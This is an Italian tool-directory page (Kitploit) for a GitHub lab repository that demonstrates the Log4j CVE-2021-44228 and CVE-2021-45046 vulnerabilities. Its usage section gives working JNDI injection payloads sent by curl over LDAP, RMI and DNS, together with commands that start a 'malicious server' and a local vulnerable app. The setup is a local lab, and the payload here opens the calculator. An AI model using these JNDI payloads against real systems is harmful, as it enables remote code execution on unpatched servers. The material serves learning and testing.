Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
log4j-cve-2021-44228 — Esempi di Log4j CVE-2021-44228: Esecuzione remota di codice (tramite LDAP, RMI, ...), Query DNS forzate, ... | Kitploit
Strumenti/GitHubGitHub/manuel-alvarez-alvarez/log4j-cve-2021-44228
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneSviluppo Payload
GitHubmanuel-alvarez-alvarez/log4j-cve-2021-44228

log4j-cve-2021-44228

Esempi di Log4j CVE-2021-44228: Esecuzione remota di codice (tramite LDAP, RMI, ...), Query DNS forzate, ...

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
514 anni faNon ancora revisionato

Log4j CVE-2021-44228 e CVE-2021-45046

Prerequisiti

Usa un JDK vulnerabile, ad esempio JDK 1.8.0_181

Utilizzo

Server malevolo

Il server malevolo distribuisce i seguenti endpoint:

  • 1389 server LDAP
  • 1099 server RMI
  • 8081 server HTTP
root@kitploit:~
./gradlew :malicious-server:bootRun

Applicazione vulnerabile

L'applicazione vulnerabile espone un endpoint HTTP su 8082

root@kitploit:~
./gradlew :vulnerable-app:bootRun

Esecuzione remota di codice

Scegli un payload che verrà eseguito dall'applicazione vulnerabile e codificalo in Base64. Ad esempio, per aprire la calcolatrice in Windows: calc.exe

LDAP

root@kitploit:~
curl --header "X-Vulnerable-Header: ${jndi:ldap://localhost:1389/payload/Log4j/Y2FsYy5leGU=}" http://127.0.0.1:8082/

RMI

root@kitploit:~
curl --header "X-Vulnerable-Header: ${jndi:rmi://localhost:1099/payload/Log4j/Y2FsYy5leGU=}" http://127.0.0.1:8082/

Query DNS

root@kitploit:~
curl --header "X-Vulnerable-Header: ${jndi:dns://8.8.8.8/google.es}" http://127.0.0.1:8082/
Scarica lo strumento